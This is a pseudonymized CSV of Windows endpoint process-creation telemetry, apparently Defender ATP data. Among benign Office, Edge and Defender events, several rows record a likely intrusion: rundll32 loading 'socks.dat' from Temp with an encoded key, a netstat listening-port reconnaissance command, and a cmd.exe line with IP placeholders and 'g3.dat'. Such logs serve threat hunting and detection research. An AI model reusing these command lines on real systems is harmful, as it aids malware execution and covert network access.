+1301,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 09:22:17.067090+00:00,14064,EXCEL.EXE,"""EXCEL.EXE"" ""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\Downloads\FilePII_744c45d2d5b1b74b646025b5099a8d3c8446adc0.xlsx""",PortableExecutable,2021-06-12 08:57:18.794658+00:00,C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE,64015672,66d31deb154ba9b5df423b98cee537ba,e342bb0be7f5d38f8828968705ccea54ebd706a032bd50237ac4a5738638563c,2f5743f797563878746502bec5ecd37c69bab818,4bf8cf1a2379b0054860ec220ca329b9,63f8608b5eb6ba2d37fffaf46f86363faf15684a367c1603ceb06f0693c877ba,e94fc38810c097a64f7419960f2d21052d1cb2e7,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:13.094577200+00:00,18420,explorer.exe,Explorer.EXE,False,2021-06-24 00:52:12.833640100+00:00,13428,\Device\HarddiskVolume3\Windows\System32\userinit.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 09:22:18.115369400+00:00,2021-06-24 09:22:38.672588600+00:00,7aaeaccb-03d6-43f3-8f09-14a52b14f864,computerpii_0a470890c60768167990033d701e7bd881398861,178219,False,10.7740.19041.1052,False,11540474045175127,,11540474045177588,2021-06-24 00:52:13.094577200+00:00,18420,2021-06-24 00:52:13.094577200+00:00,\Device\HarddiskVolume3\Windows\explorer.exe,18420,128,ActiveProcessStartkey,C:\Windows,4891752,2074-04-27 14:38:40+00:00,2021-06-09 01:20:37.481306100+00:00,2021-06-24 00:52:13.096789600+00:00,2021-06-09 01:20:37.358875500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,20481.0,1.0,1025.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,explorer,EXPLORER.EXE,Windows Explorer,Microsoft Corporation,Microsoft Office,16.0.13801.20738,Excel,Excel.exe,Microsoft Excel
+1302,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 07:16:37.423571300+00:00,9528,cmd.exe,"""cmd.exe"" /c ""netstat -ano | find ""LIST""""",PortableExecutable,2021-02-17 04:34:58.875918800+00:00,C:\Windows\System32\cmd.exe,289792,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,ef3179d498793bf4234f708d3be28633,b53f3c0cd32d7f20849850768da6431e5f876b7bfa61db0aa0700b02873393fa,dd399ae46303343f9f0da189aee11c67bd868222,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 01:01:01.746618400+00:00,13732,rundll32.exe,"""rundll32.exe"" C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\socks.dat,#1 ekaneR12ATiPgB7C3Dr4+At9Lf4ljqq/fA/K4LYq42JQQo2BrDWbpw==",False,2021-06-24 00:59:43.689127700+00:00,9244,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 07:16:37.521028200+00:00,2021-06-24 07:18:56.605243400+00:00,b612cdd4-8875-4747-b86f-862fec225111,computerpii_0a470890c60768167990033d701e7bd881398861,176935,False,10.7740.19041.1052,False,11540474045175422,,11540474045177062,2021-06-24 01:01:01.746618400+00:00,13732,2021-06-24 01:01:01.746618400+00:00,\Device\HarddiskVolume3\Windows\System32\rundll32.exe,13732,16512,ActiveProcessStartkey,C:\Windows\System32,71680,2103-08-07 22:53:31+00:00,2021-02-17 04:35:14.392957300+00:00,2021-06-24 00:54:21.245734700+00:00,2021-02-17 04:35:14.391957+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,0.0,1.0,0.0,257.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,rundll,RUNDLL32.EXE,Windows host process (Rundll32),Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor
+1303,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 07:16:37.438847100+00:00,1332,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 07:16:37.423571300+00:00,9528,cmd.exe,"""cmd.exe"" /c ""netstat -ano | find ""LIST""""",False,2021-06-24 01:01:01.746618400+00:00,13732,\Device\HarddiskVolume3\Windows\System32\rundll32.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 07:16:37.521474800+00:00,2021-06-24 07:18:56.605290400+00:00,ec183a71-5984-42c7-90cd-7791ffba30e4,computerpii_0a470890c60768167990033d701e7bd881398861,176936,False,10.7740.19041.1052,False,11540474045177062,,11540474045177063,2021-06-24 07:16:37.423571300+00:00,9528,2021-06-24 07:16:37.423571300+00:00,\Device\HarddiskVolume3\Windows\System32\cmd.exe,9528,16512,ActiveProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-24 06:26:14.590206500+00:00,2021-02-17 04:34:58.875918800+00:00,18560,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,0.0,257.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1304,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 07:16:37.502929900+00:00,15940,NETSTAT.EXE,netstat  -ano ,PortableExecutable,2019-12-07 09:09:34.006180900+00:00,C:\Windows\System32\NETSTAT.EXE,39936,7fddd6681ea81ce26e64452336f479e6,b094e827af70241d71bed9767ec1a254fdc4164a646b2ba4c7105cd783adba0d,c038069021cea437ae40b421929e9d4d1a3440b3,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 07:16:37.423571300+00:00,9528,cmd.exe,"""cmd.exe"" /c ""netstat -ano | find ""LIST""""",False,2021-06-24 01:01:01.746618400+00:00,13732,\Device\HarddiskVolume3\Windows\System32\rundll32.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 07:16:37.522906600+00:00,2021-06-24 07:18:56.605337300+00:00,e53e65aa-cb30-4892-ab81-c6b9b974b1f7,computerpii_0a470890c60768167990033d701e7bd881398861,176937,False,10.7740.19041.1052,False,11540474045177062,,11540474045177064,2021-06-24 07:16:37.423571300+00:00,9528,2021-06-24 07:16:37.423571300+00:00,\Device\HarddiskVolume3\Windows\System32\cmd.exe,9528,18560,ActiveProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-24 06:26:14.590206500+00:00,2021-02-17 04:34:58.875918800+00:00,18560,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,0.0,257.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,netstat.exe,netstat.exe,TCP/IP Netstat Command
+1305,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 07:16:37.507821300+00:00,18600,find.exe,"find  ""LIST""",PortableExecutable,2019-12-07 09:09:37.707866+00:00,C:\Windows\System32\find.exe,17920,ae3f3dc3ed900f2a582bad86a764508c,1a1876c5eed2b8cd9e14ebff3f4eeb7e21552a4c6aab4bf392a55f8df3612dab,1e44ee63bdb2cf3a6e48b521844204218a001344,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 07:16:37.423571300+00:00,9528,cmd.exe,"""cmd.exe"" /c ""netstat -ano | find ""LIST""""",False,2021-06-24 01:01:01.746618400+00:00,13732,\Device\HarddiskVolume3\Windows\System32\rundll32.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 07:16:37.523180900+00:00,2021-06-24 07:18:56.605385700+00:00,9834f8fa-85fd-4f59-a85a-285c189a5560,computerpii_0a470890c60768167990033d701e7bd881398861,176938,False,10.7740.19041.1052,False,11540474045177062,,11540474045177065,2021-06-24 07:16:37.423571300+00:00,9528,2021-06-24 07:16:37.423571300+00:00,\Device\HarddiskVolume3\Windows\System32\cmd.exe,9528,18560,ActiveProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-24 06:26:14.590206500+00:00,2021-02-17 04:34:58.875918800+00:00,18560,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,0.0,257.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,find,FIND.EXE,Find String (grep) Utility
+1306,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 01:45:08.573073300+00:00,15840,SearchProtocolHost.exe,"""SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe852_ Global\UsGthrCtrlFltPipeMssGthrPipe852 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon"" ",PortableExecutable,2021-06-09 01:20:40.707822200+00:00,C:\Windows\System32\SearchProtocolHost.exe,419328,98ffd56887c1511e98a5542531829025,62d8455ee452be6aa6164426e43f2f1461858dd305a3e784dbd01e32691f30dc,e3228222bbeca59a928647c66c4162d1e33ae4a4,3effdb0c80e124422002c4c9ab44260b,e1bd5d2944c4ddfe7cbf6a5a14d8f06a35598a02a5ad824304f0b7936c410d7f,d3820e98b7a6f63507e21173ccdfe385bc956b65,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-12 08:58:16.041470900+00:00,4660,SearchIndexer.exe,SearchIndexer.exe /Embedding,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 01:45:09.559753200+00:00,2021-06-25 01:46:45.521230500+00:00,c9b9a57f-498e-4db0-82f8-022c7c06b589,computerpii_0a470890c60768167990033d701e7bd881398861,183963,False,10.7740.19041.1052,False,11540474045144190,,11540474045178839,2021-06-12 08:58:16.041470900+00:00,4660,2021-06-12 08:58:16.041470900+00:00,\Device\HarddiskVolume3\Windows\System32\SearchIndexer.exe,4660,128,ActiveProcessStartkey,C:\Windows\System32,935424,2033-01-12 07:23:33+00:00,2021-06-09 01:20:40.758122300+00:00,2021-06-12 08:58:09.260084800+00:00,2021-06-09 01:20:40.738030500+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchIndexer.exe,SearchIndexer.exe,Microsoft Windows Search Indexer,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchProtocolHost.exe,SearchProtocolHost.exe,Microsoft Windows Search Protocol Host
+1307,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 01:16:56.369666800+00:00,14872,SenseCncProxy.exe,4964,PortableExecutable,2021-05-12 01:12:26.930234800+00:00,C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe,744776,affeaa20cf87ef4bbdc1529ab7fea66d,617bacf42b34dfb44986b4c855f07a7db54b27b6a5a78101bf4e53945d4e65b6,b19ae47bee16c9e6111db0ce54ee8ab52b32273d,7683949c195624008c868b6a7ab6a45c,8a31fd68d0629b6e486209353210c6e4f815ffb1b38e7ab58438ca0c9637f018,3eb02a132c439e2adf17ee32ddf6208727092c5a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,"""MsSense.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 01:16:57.067021200+00:00,2021-06-25 01:19:15.261185900+00:00,ae53715e-1fcb-42c4-8a00-12d31b6b7db0,computerpii_0a470890c60768167990033d701e7bd881398861,183130,False,10.7740.19041.1052,False,11540474045137006,,11540474045178696,2021-06-10 00:46:11.888696800+00:00,4916,2021-06-10 00:46:11.888696800+00:00,MsSense.exe,4916,256,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,5393304,2014-12-21 17:17:53+00:00,2021-06-09 01:20:34.243399200+00:00,2021-06-10 00:46:12.793828700+00:00,2021-06-09 01:20:34.069525500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1052,MsSense.exe,MsSense.exe,Windows Defender Advanced Threat Protection Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.964,SenseCncProxy.exe,SenseCncProxy.exe,Windows Defender Advanced Threat Protection Communications module
+1308,True,System,S-1-5-20,NETWORK SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 05:26:50.098390+00:00,8508,MpCmdRun.exe,"""MpCmdRun.exe"" GetDeviceTicket -AccessKey A811A147-F42C-0F8D-6092-88171086702A ",PortableExecutable,2021-06-14 00:56:51.807361100+00:00,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MpCmdRun.exe,644888,86cf2e5256e9650cc1acca023d0e20c7,71cafc2ce5b1adcad16c53220a818e2db8545482506a683674f452741eb933ab,ad6d711d032d1ef2a7898f73a000f94a8bd39d0e,cecd78f3ee9d8d5cdb381f3c60ae8b1a,404d8d6ac0005cd7b57aa779ff7aca223c27cef4820c94de0a39c21604d4652b,f70eca243b0409cea2f8f642274cc13f23a22a25,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-14 00:56:58.859290200+00:00,2848,MsMpEng.exe,"""MsMpEng.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 05:26:50.161166700+00:00,2021-06-23 05:28:57.402495900+00:00,a31d655d-598c-4219-96d3-a1007486ad40,computerpii_0a470890c60768167990033d701e7bd881398861,163549,False,10.7740.19041.1052,False,11540474045145394,,11540474045173693,2021-06-14 00:56:58.859290200+00:00,2848,2021-06-14 00:56:58.859290200+00:00,\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MsMpEng.exe,2848,18560,ActiveProcessStartkey,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0,136656,1998-01-06 16:00:45+00:00,2021-06-14 00:56:50.126000+00:00,2021-06-14 00:56:58.853571700+00:00,2021-06-14 00:56:51.807361100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,996,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MsMpEng.exe,MsMpEng.exe,Antimalware Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MpCmdRun,MpCmdRun.exe,Microsoft Malware Protection Command Line Utility
+1309,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 09:51:02.173104700+00:00,16156,svchost.exe,svchost.exe -k wsappx -p -s ClipSVC,PortableExecutable,2020-10-09 20:47:23.714846100+00:00,C:\Windows\System32\svchost.exe,57360,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,d8e577bf078c45954f4531885478d5a9,dfbea9e8c316d9bc118b454b0c722cd674c30d0a256340200e2c3a7480cba674,d7a213f3cfee2a8a191769eb33847953be51de54,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.554990700+00:00,988,services.exe,services.exe,True,2021-06-10 00:46:10.511942500+00:00,912,wininit.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 09:51:02.183556800+00:00,2021-06-23 09:53:15.622909900+00:00,2fc05e90-f94d-45da-b52f-3d947ca9caa5,computerpii_0a470890c60768167990033d701e7bd881398861,166763,False,10.7740.19041.1052,False,11540474045136906,,11540474045174788,2021-06-10 00:46:10.554990700+00:00,988,2021-06-10 00:46:10.554990700+00:00,\Device\HarddiskVolume3\Windows\System32\services.exe,988,128,ActiveProcessStartkey,C:\Windows\System32,714856,2060-05-15 06:03:53+00:00,2021-04-14 01:10:20.152151800+00:00,2021-06-10 00:46:12.753506800+00:00,2021-04-14 01:10:20.136168100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.928,services.exe,services.exe,Services and Controller app,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services
+1310,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 01:56:00.400596600+00:00,5520,identity_helper.exe,"""identity_helper.exe"" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,2987170515631334499,3695594818534080064,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6780 /prefetch:8",PortableExecutable,2021-06-18 23:49:38.664048500+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\91.0.864.54\identity_helper.exe,1080720,33098278b86f6e967f5e0f66da8192fa,dbe0ea072c1e26f07ae34f6b721074635048644ef14fce622e4097f05b6684c2,c345ea4721c3bafc8f7592f97f0407541b464904,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:20.669190100+00:00,15088,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-24 00:52:13.094577200+00:00,18420,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:56:00.470101200+00:00,2021-06-24 01:56:42.578189600+00:00,beffafc8-09e9-46e9-a822-78e556ac0cb5,computerpii_0a470890c60768167990033d701e7bd881398861,172705,False,10.7740.19041.1052,False,11540474045175158,,11540474045175870,2021-06-24 00:52:20.669190100+00:00,15088,2021-06-24 00:52:20.669190100+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,15088,18560,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278224,2021-06-17 16:58:31+00:00,2021-06-18 05:12:00.071479900+00:00,2021-06-23 01:16:40.091697100+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,3073.0,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge,,Microsoft Edge,91.0.864.54,PWA Identity Proxy Host,identity_helper.exe,PWA Identity Proxy Host
+1311,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 01:32:13.098599800+00:00,18548,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 01:32:13.089437300+00:00,20232,cmd.exe,cmd.exe Ipv4PII_4a34f73ccd9be64053fdf49c09f06269f34c00f9    Ipv4PII_a0ee8a6d770643416f3f104a108fa402b44c6033 c:\users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\g3.dat,False,2021-06-24 01:01:01.746618400+00:00,13732,\Device\HarddiskVolume3\Windows\System32\rundll32.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:32:13.168804+00:00,2021-06-24 01:33:35.742659800+00:00,396bf3de-a100-4ded-9002-d54b4e515bf1,computerpii_0a470890c60768167990033d701e7bd881398861,172225,False,10.7740.19041.1052,False,11540474045175763,,11540474045175764,2021-06-24 01:32:13.089437300+00:00,20232,2021-06-24 01:32:13.089437300+00:00,\Device\HarddiskVolume3\Windows\System32\cmd.exe,20232,128,ActiveProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-24 01:10:55.210484500+00:00,2021-02-17 04:34:58.875918800+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,0.0,1.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
